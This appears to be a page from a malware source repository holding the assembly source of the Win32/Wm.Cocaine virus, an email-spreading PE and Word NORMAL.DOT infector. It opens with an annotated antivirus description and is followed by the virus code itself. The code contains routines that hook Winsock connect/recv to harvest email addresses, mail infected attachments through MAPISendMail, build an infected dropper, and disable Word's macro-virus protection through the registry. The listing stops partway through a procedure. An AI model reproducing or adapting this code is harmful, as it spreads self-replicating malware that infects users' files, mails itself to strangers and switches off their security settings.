MalwareSourceCode/Win32/Infector/Win32.Cocaine.asm
2020-10-16 23:26:21 +02:00

5768 lines
192 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;Wm/W32.Cocaine - 22231 bytes
;(c) Vecna 1999
;
;This virus infect PE and DOC files.
;
;Study the code and the AVPVE description for others features.
;
;Small corrections in AVPVE text are between []'s
;
;
;
;AVPVE Description:
;
; Cocaine
;
; ------------------------------------------------------------------------
; This is a parasitic Windows PE files and MS Word normal templates infector
; with email spreading ability, about 22Kb of length. The virus has three
; instances: in Windows PE EXE files, in Word NORMAL template and as attached
; file in email messages.
;
; The virus code in infected PE EXE files is its main instance. When it is
; executed, the virus searches for PE EXE files in the current and Windows
; directories and infects them. The virus also drops infected an NORMAL.DOT
; to the MS Word directory from its PE EXE instance, as well as sends
; infected emails. The virus instance in the NORMAL template drops and
; executes the infected PE EXE file on each document closing, and is not able
; to infect other documents and templates. [* Wrong. Check the infected doc I
; included, or the file MACRO.INC for the code *] The virus code in emails
; appears as attached file that is infected an PE EXE Windows executable file
; with a random name, or infected NORMAL template.
;
; The virus is per-process memory resident. This means that the virus copy
; may stay in memory for a long time until the infected application
; terminates. In case only "short-life" applications are infected, the virus
; code is not present in the system memory for long time. In case an
; application in permanent use is infected, the virus is active during a long
; time, hooks Windows functions, infects PE EXE files that are accessed and
; sends email messages.
;
; The virus is polymorphic in PE files as well as in Word NORMAL template.
; The virus has two polymorphic engines in its EXE code: the first of them
; generates polymorphic decryption loop in infected PE EXE files, the second
; one makes the virus macro program in infected NORMAL.DOT polymorphic too.
;
; The virus has a payload routine that is executed when an infected file is
; run after four months when it was infected. [* 8 months... Maybe AAM 12
; confused AVers ;-) *] This routine displays message boxes that have the
; header "W32/Wm.Cocaine" and the text that is randomly selected from seven
; variants:
;
; Your life burn faster, obey your master...
; Chop your breakfast on a mirror...
; Veins that pump with fear, sucking darkest clear...
; Taste me you will see, more is all you need...
; I will occupy, I will help you die...
; I will run through you, now I rule you too...
; Master of Puppets, I'm pulling your strings...
;
; The virus pays attention to anti-virus programs and tries to disable them.
; Each time an infected file is executed and virus installs its per-process
; resident copy it looks for anti-virus data files in the current directory
; and deletes them. The names of these files look like follows: KERNEL.AVC,
; SIGN.DEF, FIND.DRV, NOD32.000, DSAVIO32.DLL, SCAN.DAT, VIRSCAN.DAT (AVP,
; DSAV, NOD, SCAN and other anti-virus data files). The virus also locates
; and terminates old version of AVP Monitor on-access scanner. [* Not so
; old ;-) *]
;
; The known virus version has bugs and cannot spread from Word macro instance
; to Windows executable. It also has a bug in PE EXE infection routine and
; corrupts some WinNT executable files. [* What can I say... is buggy :-) *]
;
; The virus has a "copyright" text:
;
; (c) Vecna
;
; Some virus routines (especially macro ones) are related to the "Fabi"
; multi-platform virus, and some infected files may be detected by the name
; of this virus. [* Probably, the loader, before it load the poly virus code,
; can be detected as Fabi *]
;
; Technical details
;
; The virus has quite large size for a program written in Assembler - about
; 22Kb, and has many routines that are quite interesting from a technical
; point of view.
;
; Running infected EXE
;
; When an infected file takes control the polymorphic decryption loops are
; executed. They decrypt the virus code layer-by-layer (the virus is
; encrypted by several loops - from two till five) and pass control to the
; virus installation routine. It is necessary to note that several virus
; blocks stay still encrypted. The virus decrypts and accesses them in case
; of need, and then encrypts back. These blocks are MS Word infection data
; and routine as well as PE EXE polymorphic engine.
;
; The virus installation routine looks for necessary Windows API functions
; addresses that are used by the virus later. The list of these functions is
; quite long, this is caused by list of things the virus does to spread
; itself. The functions list the virus looks for is below:
;
; Exported by Functions list
; ----------- --------------
; KERNEL32.DLL: GetProcAddress GetModuleHandleA CreateProcessA
; CreateFileA WinExec CloseHandle LoadLibraryA FreeLibrary
; CreateFileMappingA MapViewOfFile UnmapViewOfFile
; FindFirstFileA FindNextFileA FindClose SetEndOfFile
; VirtualAlloc VirtualFree GetSystemTime
; GetWindowsDirectoryA GetSystemDirectoryA
; GetCurrentDirectoryA SetFileAttributesA SetFileTime
; ExitProcess GetCurrentProcess WriteProcessMemory WriteFile
; DeleteFileA Sleep CreateThread GetFileSize SetFilePointer
; USER32.DLL: MessageBoxA FindWindowA PostMessageA
; ADVAPI32: RegSetValueExA RegCreateKeyExA RegOpenKeyExA
; RegQueryValueExA RegCloseKey
; MAPI32.DLL: MAPISendMail
;
; The virus gets these functions' addresses by the standard Windows virus
; trick: it locates the image on KERNEL32.DLL in the Windows memory, scans
; its Export table and gets addresses of two functions: GetModuleHandle and
; GetProcAddress [* The import table is searched while infecting a file for
; GetModuleHandle *]. By using these two functions the virus is then able
; easily locate all addresses of other necessary functions. The most
; interesting feature of this routine is: this is the first virus that processes
; not only Win95/98 and WinNT addresses while looking for KERNEL32.DLL image,
; but pays attention for Win2000 addresses also [* If the host dont import
; GetModuleHandle this is *]
;
; The virus then locates and infects the MS Word, then searches for PE EXE
; files and also infects them, then hooks a set of system events (files and
; emails access) that is used to locate and infect more files as well as
; spread virus copy to the Internet in attached emails.
;
; Infecting MS Word
;
; The very first infection routine that is activated by the virus is its MS
; Word affecting routine, if it is installed in the system. First of all here
; the virus checks for C:\ANCEV.SYS file presence.
;
; The C:\ANCEV.SYS file ("ANCEV"="VECNA" written backward) has a special
; purpose. This file is created when the MS Word template infection routine
; completes. So, this file presence means that MS Word was located and
; NORMAL.DOT template was infected. In this case the virus while sending
; emails sends NORMAL.DOT template but not the infected EXE dropper [* I used
; to think that DOC files are less suspicious to send by email, but, after
; melissa's shits, EXE are better i gues *]
;
; So, the virus checks for this file at the very top of MS Word infection
; routine. If it does not exist, the virus continues infection. If this file
; is found, the virus randomly in one cases of ten continues infection, and
; in nine cases of ten leaves infection routine. This means that in one case
; of ten the MS Word NORMAL.DOT will be re-infected anyway [* This is done to
; avoid lamers creating a fake ANCEV.SYS to not have WinWord infected *].
;
; The virus then disables the Word VirusWarning protection by modifying the
; system registry keys where Word stores its settings:
;
; SOFTWARE\Microsoft\Office\8.0\Word\Options, EnableMacroVirusProtection
;
; The virus then gets Word's templates directory also by reading system
; registry:
;
; SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates
;
; and deletes the NORMAL.DOT template in there, and then creates a new
; NORMAL.DOT template file - infected one. The infected NORMAL.DOT contains a
; small macro inside. This macro has "AutoExec" Word auto-name - it will be
; automatically executed on next Word startup and will import the main virus
; macro from the C:\COCAINE.SYS file.
;
; The C:\COCAINE.SYS file is created by the virus just after overwriting the
; NORMAL.DOT template. This SYS file is a text file that contains VBA
; program's source code. This source is extracted by the virus from its code,
; mixed with junk (polymorphic) VBA instructions and appended by infected PE
; EXE dropper converted to ASCII strings.
;
; So, the MS Word infection routine does its work in two steps. First of all
; the virus replaces the original NORMAL.DOT with a new one that contains the
; "AutoExec" macro program (loader) that imports complete virus code from the
; C:\COCAINE.SYS file, and completes by that porting virus code from PE EXE
; file to MS Word template.
;
; From Word to EXE
;
; To drop the PE EXE file from its Word template instance the virus uses a
; standard macro-viruses' trick. It creates two files: the first of them is
; the C:\COCAINE.SRC file with infected PE EXE file image converted to ASCII
; form, and second file is a DOS batch with random name. This batch file
; contains a set of instructions that execute the DOS DEBUG utility that
; converts ASCII dump back to binary PE EXE form, and executes it [* This is
; the worst imaginable way to drop a EXE file ever *]
;
; So the virus jumps to Windows out of infected Word template.
;
; Infecting PE EXE files
;
; When MS Word is affected, the virus goes to PE EXE files infection routine.
; The virus looks for PE EXE files in the current and Windows directories and
; infects them. The only files infected are those that have .EXE or .SCR
; filename extensions.
;
; The virus then looks for installed browser and mailer and infects them too.
; The virus locates them by system registry keys in HKEY_LOCAL_MACHINE
; storage:
;
; SOFTWARE\Classes\htmlfile\shell\open\command
; SOFTWARE\Classes\mailto\shell\open\command
;
; The virus needs these files to be infected for activating its Internet
; infection routines. When these Internet accessing applications are
; infected, the virus copy is active in the memory for a long time exactly at
; the moment a user is connected to the Internet. This is necessary to the
; virus to realize its Internet spreading ability.
;
; PE EXE Infection mechanism
;
; The virus checks several conditions before infecting the file. 1st: the
; file length has to be not divisible by 101 (it is virus protection to avoid
; multiple infection, the already infected PE EXE files have such length).
; 2nd: when the virus looks for EXE files in the current and Windows
; directories to infect them, the name of the file cannot contain 'V' letter
; or digits, here the virus avoids most popular anti-virus scanners and "goat
; files" infection.
;
; If the first section has big enough size (more than 2304 bytes), the virus
; writes to there several blocks of junk code that passes the control
; block-by-block to the main virus decryption loops. There are eight blocks
; written to files when the virus infects them:
;
; +------------+
; | |
; |PE Header | ---------------+
; +------------+ |
; | +-----+<-+| |
; | |Junk2| || |
; | +-----+-+|| Entry Point |
; |+-----+ |||<---------------+
; ||Junk1| |||
; |+-----+----+|
; | | |
; |+-----+<--+ |
; ||Junk3| |
; |+-----+----+|
; | V|
; | . . . |
; | +-----+|
; |+----|Junk8||
; || +-----+|
; |V |
; |------------|
; |Virus code |
; | |
; +------------+
;
; In this case the virus does not modify program's entry point address, but
; it needs to restore all overwritten blocks of host file before return
; control to original entry procedure [* CommanderBomber/OneHalf rulez *].
;
; If the first section is short, the control goes directly to virus code. In
; this case the virus modifies program's entry address to get control when
; infected files are executed.
;
; The virus code itself is encrypted by several (from two till five)
; polymorphic loops. The polymorphic engine in the virus is quite strong, and
; produces about 2Kb of polymorphic loops [* This poly is kewl *]
;
; The virus also patches the Import section to get functions GetProcAddress,
; GetModuleHandle, CreateProcessA, WinExec and MAPISendMail when infection
; executable is run.
;
; After all the virus writes its encrypted code to the end of last file
; section, and increases section size by patching PE header.
;
; Intercepting Events
;
; When the Word and PE EXE direct infection routines are complete, the virus
; hooks several Windows functions and stays in Windows memory as part of the
; host program. The virus hooks two file access function WinExec and
; CreateProcessA, if they are imported by the host program from the
; KERNEL32.DLL. When these functions get control (a program is executed) the
; virus gets the program's file name, gets its directory, searches and
; infects PE EXE files in this directory.
;
; Sending Emails
;
; The virus per-process resident code also runs email infection thread, hooks
; MAPISendMail that is exported from MAPI32.DLL, "connect" and "recv" from
; WSOCK32.DLL and GetProcAddress from KERNEL32.DLL.
;
; The first hook is used by the virus to send its copy to the Internet. When
; the virus intercepts this event it looks for attached data in the message.
; If there is no attach, the virus appends to the message infected NORMAL.DOT
; or infected PE EXE file (the latter is created on the disk in the
; C:\ENIACOC.SYS file).
;
; The "GetProcAddress", "connect" and "recv" hooks are used by the virus to
; realize second method of infected Emails sending. When a message arrives,
; the virus scans its header for "mailto:" field, gets the address from there
; and stores it in its own database. [* MAILTO: is a HTML command/instruction
; used very often. Nice idea :-) *]
;
; When taking control the infection thread looks for email address caught by
; "connect" and "recv" hooks, calculates its CRC and compares with its
; "already infected addresses" database that is stored in the BRSCBC.DAT file
; in the Windows system directory. If this address was not used yet, the
; virus adds it to its BRSCBC.DAT database, creates a message with NORMAL
; template or infected PE EXE file, and sends it by using MAPISendMail
; function [* Why BRSCBC? ;-) *]. The subject field for the message is
; randomly selected from variants:
;
; Kewl page!
; Improvement to your page
; Your page r0x0r!
; You must see this...
; Secret stuff!
; [* or a empty subject line *]
;
; By using the BRSCBC.DAT database the virus avoids duplicate sendings, but
; on each infected program run the virus depending on its random counter
; deletes this file, and clears "do-not-send" database by that.
;
; The "GetProcAddress" that is also hooked by virus TSR copy is used only to
; intercept "connect" and "recv" WSOCK32.DLL functions, if an application
; does not import these routines "by default", but activates them in case of
; need. To do that the "GetProcAddress" virus' hook intercepts accesses to
; "connect" and "recv" WSOCK32.DLL functions' addresses. If an application
; tries to get addresses of these routines to use Internet connections, the
; virus returns addresses of its own "connect" and "recv" hookers, and so
; intercepts Internet connection [* Fucking OPERA *]
;Thnz to IkX for accepting this contribution
;Greetz to Z0MBiE, VirusBuster and Reptile(the first to use macro autoload)
;Special greetz goes to Jacky Qwerty:
;Los virus no serian lo que son hoy si no fuera por vos!
;THNDV/CAP/Cabanas RULEZ! (THNDV solo para los mas vivos ;> )
;Big fuckZ to T2000 and El Gusano Boliviano: lamers and ripperz!!!!
;Greetz to all creative coders
;Use the pre-compiled virus, but if you're a sort of 37337 d00d... to compile:
; TASM /M /ML COKE.ASM
; TLINK32 COKE,,,IMPORT32
; PEWRSEC COKE.EXE
;Remember to split the big COKE.ASM in the smaller incz before!
;(and beware the trap ;> )
;contacts: vecna_br@hotmail.com (except questions about compiling)
.586p
.model flat, STDCALL
locals
include host.inc
ofs equ offset
by equ byte ptr
wo equ word ptr
dwo equ dword ptr
TRUE EQU 1
FALSE EQU 0
MAIL_DEBUG EQU FALSE
DIRECT EQU TRUE
MONTH_DELAY EQU 8
MAX_BRANCH EQU 8 ;beware DrWeb! (5 here=detect!)
MAX_M_DEEP EQU 6
MAIL_PRIORITY EQU 10 ;seconds
MAX_SOCK EQU 10
DIV_VALUE EQU 101
MAX_PATH EQU 260
MIN_RAW EQU (MAX_BRANCH+1)*100h
vsize equ vend - vcode
msize equ mend - vcode
_VSEG segment dword use32 public 'COCAINE'
IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE
vcode label
db '(c) Vecna', 0
FunDate db 0 ;month to activate
InitWSOCK proc
call @@1
wsock32 db 'WSOCK32.DLL', 0
@@1:
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
test eax, eax
jz @@0
call @@2
db 'connect',0
@@2:
push eax
call @@3
db 'recv', 0
@@3:
push eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _recv-ofs vcode)], eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [ebp+(ofs _connect-ofs vcode)], eax
clc
ret
@@0:
stc
ret
InitWSOCK endp
http_install proc
sub ecx, ecx
call @@set_seh
mov esp, [esp+8]
call delta
jmp @@fault
@@set_seh:
push dwo fs:[ecx]
mov fs:[ecx], esp
call InitWSOCK
jc @@fault
mov ebx, [ebp+(ofs _base-ofs vcode)]
@@check:
cmp wo [ebx], 'ZM'
je @@found
@@fault:
sub ecx, ecx
pop dwo fs:[ecx]
pop ecx
ret
@@found:
mov edi, [ebx+3ch]
lea edi, [ebx+edi+128]
mov edi, [edi]
@@2:
mov esi, [ebx+edi+12]
test esi, esi
jz @@ret
add esi, ebx
lodsd
or eax, 20202020h
cmp eax, 'cosw'
je @@wsock
add edi, 20
jmp @@2
@@wsock:
mov esi, [ebx+edi+16]
add esi, ebx
@@searchloop:
lodsd
test eax, eax
jz @@ret
cmp eax, [ebp+(ofs _connect-ofs vcode)]
jne @@3
lea eax, [ebp+(ofs New_connect-ofs vcode)]
lea edi, [esi-4]
mov ecx, 4
push esi
push eax
mov esi, esp ;fake buffer in stack
call WriteMem
pop esi
pop esi
@@3:
cmp eax, [ebp+(ofs _recv-ofs vcode)]
jne @@searchloop
lea eax, [ebp+(ofs New_recv-ofs vcode)]
lea edi, [esi-4]
mov ecx, 4
push esi
push eax
mov esi, esp ;fake buffer in stack
call WriteMem
pop esi
pop esi
@@ret:
jmp @@fault
http_install endp
NewGetProcAddress proc
push esp
pushad
call delta
mov eax, [ebp+(ofs _GetProcAddress-ofs vcode)]
mov [esp+(7*4)+4], eax
call InitWSOCK
jc @@1
lea eax, [ebp+(ofs wsock32-ofs vcode)]
push eax
call [ebp+(ofs _GetModuleHandle-ofs vcode)]
test eax, eax
jz @@1
cmp [esp+(7*4)+12], eax
jnz @@1
lea eax, [ebp+(ofs CheckWSOCK32-ofs vcode)]
xchg [esp+(7*4)+8], eax
mov [ebp+(ofs wsock_ret-ofs vcode)], eax
@@1:
popad
ret
NewGetProcAddress endp
CheckWSOCK32 proc
push ebp
call delta
cmp eax, [ebp+(ofs _connect-ofs vcode)]
jne @@1
lea eax, [ebp+(ofs New_connect-ofs vcode)]
jmp @@2
@@1:
cmp eax, [ebp+(ofs _recv-ofs vcode)]
jne @@2
lea eax, [ebp+(ofs New_recv-ofs vcode)]
@@2:
pop ebp
push 12345678h
wsock_ret equ dwo $-4
ret
CheckWSOCK32 endp
New_connect proc
push esp
pushad
call delta
mov eax, [ebp+(ofs _connect-ofs vcode)]
mov [esp+(7*4)+4], eax
mov esi, [esp+(7*4)+16]
mov ax, wo [esi+2] ;port number
cmp ax, 5000h ;80
jne @@1
mov eax, [esp+(7*4)+12] ;get socket
mov ebx, [ebp+(ofs _socket-ofs vcode)]
mov [ebp+(ofs socket-ofs vcode)+(ebx*4)], eax
inc ebx
cmp ebx, MAX_SOCK
jne @@2
sub ebx, ebx
@@2:
mov [ebp+(ofs _socket-ofs vcode)], ebx
@@1:
popad
ret
New_connect endp
delta proc
call @@1
@@1:
pop ebp
sub ebp, (ofs @@1-ofs vcode)
ret
delta endp
New_recv proc
push esp
pushad
call delta
mov eax, [ebp+(ofs _recv-ofs vcode)]
mov [esp+(7*4)+4], eax
mov eax, [esp+(7*4)+12]
lea edi, [ebp+(ofs socket-ofs vcode)]
mov ecx, MAX_SOCK
repne scasd
jecxz @@1
mov eax, [esp+(7*4)+16]
mov [ebp+(ofs recv_buff-ofs vcode)], eax
mov eax, [esp+(7*4)+20]
mov [ebp+(ofs recv_size-ofs vcode)], eax
lea eax, [ebp+(ofs New_recv2-ofs vcode)]
xchg [esp+(7*4)+8], eax
mov [ebp+(ofs recv_ret-ofs vcode)], eax
@@1:
popad
ret
New_recv endp
New_recv2 proc
pushad
call delta
mov eax, [ebp+(ofs email_w-ofs vcode)]
test eax, eax
jnz @@0
mov esi, [ebp+(ofs recv_buff-ofs vcode)]
mov ecx, [ebp+(ofs recv_size-ofs vcode)]
sub ecx, 8
@@1:
push ecx
push esi
lodsd
or eax, 20202000h
cmp eax, 'iam"'
jne @@2
lodsd
or eax, 00202020h
cmp eax, ':otl'
jne @@2
lea edi, [ebp+(ofs email-ofs vcode)]
lea ebx, [edi+127]
@@4:
lodsb
cmp al, '"'
je @@3
cmp al, '?'
je @@3
cmp edi, ebx
je @@3
stosb
jmp @@4
@@3:
sub eax, eax
stosb
dec eax
mov dwo [ebp+(ofs email_w-ofs vcode)], eax
@@2:
pop esi
inc esi
pop ecx
loop @@1
@@0:
popad
push 12345678h
recv_ret equ dwo $-4
ret
New_recv2 endp
MailThread proc
cld
mov ebp, [esp+4]
sub eax, eax
call @@set_seh
mov esp, [esp+8]
call delta
push -1
call [ebp+(ofs _Sleep-ofs vcode)]
@@set_seh:
push dwo fs:[eax]
mov fs:[eax], esp
@@main_loop:
mov ecx, [ebp+(ofs email_w-ofs vcode)]
test ecx, ecx
jz @@no_queued
lea esi, [ebp+(ofs email-ofs vcode)]
push esi
sub ecx, ecx
cld
@@1strlen:
lodsb
test al, al
jz @@2strlen
inc ecx
jmp @@1strlen
@@2strlen:
mov edi, ecx
pop esi
call CRC32
mov [ebp+(ofs email_crc-ofs vcode)], eax
call CheckList
test eax, eax
jnz @@done
IF MAIL_DEBUG EQ TRUE
sub ecx, ecx
push 4 ;yes/no
lea eax, [ebp+(ofs title1-ofs vcode)]
push eax
lea eax, [ebp+(ofs email-ofs vcode)]
push eax
push ecx
call [ebp+(ofs _MessageBoxA-ofs vcode)]
cmp eax, 7 ;no!
je @@done
ENDIF
lea eax, [ebp+(ofs mapi-ofs vcode)]
push eax
call [ebp+(ofs _LoadLibraryA-ofs vcode)]
test eax, eax
jz @@done
mov [ebp+(ofs _mapi-ofs vcode)], eax
lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)]
push ecx
push eax
call [ebp+(ofs _GetProcAddress-ofs vcode)]
test eax, eax
jz @@unload_mapi
mov [ebp+(ofs _MAPISendMail-ofs vcode)], eax
call OpenAncev
jc @@file ;file dont exists, binary send
@@doc:
call GetTemplateDir
@@1:
lodsb
test al, al
jnz @@1
lea edi, [esi-1]
lea esi, [ebp+(ofs ndot-ofs vcode)]
@@3:
lodsb
stosb
test al, al
jnz @@3
lea esi, [ebp+(ofs directory-ofs vcode)]
push 80h
push esi
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz @@file
mov edx, 'COD.'
jmp @@attach
@@file:
call CreateDropper
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax ;buffer
mov eax, [ebp+(ofs fsizel-ofs vcode)]
push eax ;size
lea edi, [ebp+(ofs directory-ofs vcode)]
push edi
lea esi, [ebp+(ofs shitfile-ofs vcode)]
@@4:
lodsb
stosb
test al, al
jnz @@4
mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h
call WriteDump ;hidden dump
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)]
mov edx, 'EXE.'
@@attach:
DATA_SIZE = size MapiMessage + ((size MapiRecipDesc)*2) + size MapiFileDesc
mapimsg = 0
origin = mapimsg + size MapiMessage
destin = origin + size MapiRecipDesc
file = destin + size MapiRecipDesc
sub eax, eax
mov ecx, DATA_SIZE
sub esp, ecx
mov edi, esp
mov esi, edi
rep stosb ;clear buffers we'll use
lea eax, [esi+origin]
mov [esi.mapimsg.lpOriginator], eax
lea eax, [esi+destin]
mov [esi.mapimsg.lpRecips], eax
lea eax, [esi+file]
mov [esi.mapimsg.lpFiles], eax
push 1
pop eax
mov [esi.mapimsg.nFileCount], eax
mov [esi.mapimsg.nRecipCount], eax
mov [esi.destin.ulRecipClass], eax
inc eax
mov [esi.mapimsg.flags], eax
lea eax, [ebp+(ofs email-ofs vcode)]
mov [esi.destin.lpszName], eax
mov [esi.destin.lpszAddress], eax
lea eax, [ebp+(ofs directory-ofs vcode)]
mov [esi.file.lpszPathName], eax
lea edi, [ebp+(ofs fname-ofs vcode)]
mov [esi.file.lpszFileName], edi
call MakeVar
mov eax, edx
stosd
sub eax, eax
stosb
mov eax, [ebp+(ofs subject-ofs vcode)]
mov [esi.mapimsg.lpszSubject], eax
call @@1aa
db '', 0
@@1aa:
pop [esi.mapimsg.lpszNoteText]
sub eax, eax
push eax
push eax
push esi
push eax
push eax
call [ebp+(ofs _MAPISendMail-ofs vcode)]
test eax, eax
jnz @@33
sub eax, eax
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
call InsertList
@@33:
add esp, DATA_SIZE
lea eax, [ebp+(ofs shitfile-ofs vcode)]
push eax
call DeleteShitFile
@@unload_mapi:
mov eax, [ebp+(ofs _mapi-ofs vcode)]
call [ebp+(ofs _FreeLibrary-ofs vcode)]
@@done:
sub eax, eax
mov [ebp+(ofs email_w-ofs vcode)], eax
@@no_queued:
push MAIL_PRIORITY*1000
call [ebp+(ofs _Sleep-ofs vcode)]
jmp @@main_loop
MailThread endp
GetTemplateDir proc
call @@2
db 'SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates', 0
@@2:
pop eax
call ConsultKey
ret
GetTemplateDir endp
CreateDropper proc
push 00000040h
push 00002000h+00001000h+00100000h
push 48*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
sub edi, edi
xchg edi, eax
call @@1
@@0:
db04Dh, 05Ah, 050h, 000h, 000h, 000h, 002h, 000h
db002h, 000h, 004h, 000h, 000h, 000h, 00Fh, 000h
db000h, 000h, 0FFh, 0FFh, 000h, 001h, 000h, 0B8h
db000h, 006h, 000h, 040h, 000h, 000h, 000h, 01Ah
db000h, 021h, 000h, 001h, 000h, 001h, 000h, 0BAh
db010h, 000h, 000h, 000h, 00Eh, 01Fh, 0B4h, 009h
db0CDh, 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 090h
db090h, 054h, 068h, 069h, 073h, 020h, 070h, 072h
db06Fh, 067h, 072h, 061h, 06Dh, 020h, 06Dh, 075h
db073h, 074h, 020h, 062h, 065h, 020h, 072h, 075h
db06Eh, 020h, 075h, 06Eh, 064h, 065h, 072h, 020h
db057h, 069h, 06Eh, 033h, 032h, 00Dh, 00Ah, 024h
db037h, 000h, 087h, 000h, 050h, 045h, 000h, 001h
db000h, 04Ch, 001h, 004h, 000h, 000h, 000h, 074h
db025h, 0F5h, 00Eh, 000h, 007h, 000h, 0E0h, 000h
db000h, 000h, 08Eh, 081h, 00Bh, 001h, 002h, 019h
db000h, 000h, 000h, 002h, 000h, 002h, 000h, 006h
db000h, 006h, 000h, 010h, 000h, 002h, 000h, 010h
db000h, 002h, 000h, 020h, 000h, 003h, 000h, 040h
db000h, 001h, 000h, 010h, 000h, 002h, 000h, 002h
db000h, 001h, 000h, 001h, 000h, 006h, 000h, 003h
db000h, 000h, 000h, 00Ah, 000h, 005h, 000h, 050h
db000h, 002h, 000h, 004h, 000h, 005h, 000h, 002h
db000h, 004h, 000h, 010h, 000h, 001h, 000h, 020h
db000h, 003h, 000h, 010h, 000h, 001h, 000h, 010h
db000h, 005h, 000h, 010h, 000h, 00Bh, 000h, 030h
db000h, 001h, 000h, 054h, 000h, 01Bh, 000h, 040h
db000h, 001h, 000h, 00Ch, 000h, 052h, 000h, 043h
db04Fh, 044h, 045h, 000h, 004h, 000h, 002h, 000h
db002h, 000h, 010h, 000h, 002h, 000h, 002h, 000h
db002h, 000h, 006h, 000h, 00Dh, 000h, 020h, 000h
db001h, 000h, 060h, 044h, 041h, 054h, 041h, 000h
db004h, 000h, 002h, 000h, 002h, 000h, 020h, 000h
db002h, 000h, 002h, 000h, 002h, 000h, 008h, 000h
db00Dh, 000h, 040h, 000h, 001h, 000h, 0C0h, 02Eh
db069h, 064h, 061h, 074h, 061h, 000h, 002h, 000h
db002h, 000h, 002h, 000h, 030h, 000h, 002h, 000h
db002h, 000h, 002h, 000h, 00Ah, 000h, 00Dh, 000h
db040h, 000h, 001h, 000h, 0C0h, 02Eh, 072h, 065h
db06Ch, 06Fh, 063h, 000h, 002h, 000h, 002h, 000h
db002h, 000h, 040h, 000h, 002h, 000h, 002h, 000h
db002h, 000h, 00Ch, 000h, 00Dh, 000h, 040h, 000h
db001h, 000h, 050h, 000h, 067h, 003h, 06Ah, 000h
db000h, 000h, 0E8h, 000h, 003h, 000h, 0FFh, 025h
db030h, 030h, 040h, 000h, 0F3h, 003h, 028h, 030h
db000h, 009h, 000h, 038h, 030h, 000h, 001h, 000h
db030h, 030h, 000h, 015h, 000h, 046h, 030h, 000h
db005h, 000h, 046h, 030h, 000h, 005h, 000h, 04Bh
db045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh
db064h, 06Ch, 06Ch, 000h, 003h, 000h, 045h, 078h
db069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h
db073h, 000h, 0ADh, 001h, 010h, 000h, 001h, 000h
db00Ch, 000h, 002h, 000h, 009h, 030h
@@1:
pop esi
mov ecx, ofs @@1-ofs @@0
@@2:
lodsb
stosb
test al, al
jnz @@3
dec ecx
dec ecx
lodsw
push ecx
xor ecx, ecx
xchg ecx, eax
jecxz @@4
rep stosb
@@4:
pop ecx
@@3:
loop @@2
mov [ebp+(ofs fsizeh-ofs vcode)], ecx
mov dwo [ebp+(ofs fsizel-ofs vcode)], 4096
call Infect
ret
CreateDropper endp
random_f proc
push eax
call random0
pop eax
ret
random_f endp
macro_start equ this byte
include ndot.inc
MacroSpread proc
sub ecx, ecx
call @@set_seh
mov esp, [esp+8]
call delta
jmp @@0
@@set_seh:
push dwo fs:[ecx]
mov fs:[ecx], esp
call OpenAncev
jc @@1 ;dont exists, macro spread
mov eax, 10
call random
or eax, eax ;just in case that we are
jnz @@0 ;reinfecting
@@1:
call @@2
@@1v dd 0
@@2:
push 000F003Fh ;KEY_ALL_ACCESS
push 0
call @@3
db 'SOFTWARE\Microsoft\Office\8.0\Word\Options', 0
@@3:
push 80000001H ;HKEY_CURRENT_USER
call [ebp+(ofs _RegOpenKeyEx-ofs vcode)]
test eax, eax
jnz @@0
push 1 ;size
call @@4
db '0', 0
@@4:
push 1 ;type
push 0
call @@5
db 'EnableMacroVirusProtection', 0 ;key entry
@@5:
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegSetValueEx-ofs vcode)]
push dwo [ebp+(ofs @@1v-ofs vcode)]
call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key
call GetTemplateDir
cld
push esi
@@6:
lodsb
test al, al
jnz @@6
lea edi, [esi-1]
lea esi, [ebp+(ofs ndot-ofs vcode)]
@@8:
lodsb
stosb
test al, al
jnz @@8
call DeleteShitFile
push 00000040h
push 00002000h+00001000h+00100000h
push 48*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)];alloc memory for my normal.dot
mov [ebp+(ofs mm_on_off-ofs vcode)], eax
lea eax, [ebp+(ofs normaldot-ofs vcode)]
push eax
push normaldot_size
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax
lea eax, [ebp+(ofs normaldot_sized-ofs vcode)]
push eax
call lzrw1_decompress ;unpack normaldot
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
push eax
mov eax, [ebp+(ofs normaldot_sized-ofs vcode)]
push eax
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax ;dump not hidden
mov dwo [ebp+(ofs wd_att-ofs vcode)], 80h
call WriteDump ;create/write new normal.dot
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from normal.dot
call CreateDropper
push 00000040h
push 00002000h+00001000h+00100000h
push 150*1024
push 0
call [ebp+(ofs _VirtualAlloc-ofs vcode)]
mov [ebp+(ofs dbgscript-ofs vcode)], eax
mov edi, eax
push eax
mov esi, [ebp+(ofs mm_on_off-ofs vcode)]
mov ecx, dwo [ebp+(ofs fsizel-ofs vcode)]
call script ;make debug script
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs mm_on_off-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from EXE dropper
pop eax
sub edi, eax
